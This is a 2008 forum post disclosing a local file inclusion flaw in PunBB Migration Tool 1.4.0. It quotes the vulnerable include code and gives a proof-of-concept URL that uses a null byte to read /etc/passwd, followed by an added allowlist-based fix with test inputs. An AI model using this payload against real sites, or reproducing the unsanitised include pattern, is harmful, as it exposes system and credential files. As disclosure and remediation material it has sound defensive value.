Guest Kenpachi
Posted February 10, 2008

[RST BugTrack]
Script Name: PunBB Migration Tool 1.4.0
Download URL: http://punbb.er.cz/czmirror/PunBB_Migration_Tool-1.4.0.tar
Bug Type: Local File Inclusion
Bug In: converters/index.php
Vulnerable Code:
<?php
// Load a specific page
else
{
    if(file_exists($_GET['page'] . '.php'))
        include $_GET['page'] . '.php';
    else
        include 'settings.php';
}
?>
Proof Of Concept:
http://www.website.com/[path]/converters/index.php?page=/etc/passwd%00
[/RST BugTrack]
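
A hardened form of the page loader quoted above, as an added example that is not part of the original post or of PunBB Migration Tool: the request value is only compared against an allowlist and is never concatenated into the include path. The page names in the allowlist and the sample base directory are assumptions made for illustration.

```php
<?php
// Added example (not PunBB Migration Tool code): allowlisted page loader.
// The page names and the sample base directory are hypothetical placeholders.

/**
 * Map the request value to a file inside $base_dir.
 * Anything that is not an exact allowlist match resolves to the default page.
 */
function resolve_page_file($requested, array $allowed, $base_dir, $default = 'settings')
{
    // ?page[]=x arrives as an array, so non-strings fall through to the default.
    // Strict in_array() means separators, "..", and NUL bytes can never match.
    $name = (is_string($requested) && in_array($requested, $allowed, true))
        ? $requested
        : $default;

    // The path is built only from a fixed directory and an allowlisted name.
    return rtrim($base_dir, '/\\') . DIRECTORY_SEPARATOR . $name . '.php';
}

$allowed_pages = array('settings', 'forum_select', 'convert'); // hypothetical names

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs, including the value from the proof of concept.
    $samples = array('convert', "/etc/passwd\0", '../config', array('x'), null);
    foreach ($samples as $s) {
        echo var_export($s, true), ' => ',
            resolve_page_file($s, $allowed_pages, '/srv/app/converters'), "\n";
    }
} else {
    // Web request: same resolver, anchored to this script's own directory.
    $page = isset($_GET['page']) ? $_GET['page'] : null;
    include resolve_page_file($page, $allowed_pages, dirname(__FILE__));
}
```

Run from the command line, the script prints the file each constructed input resolves to; every input other than an exact allowlist match resolves to settings.php.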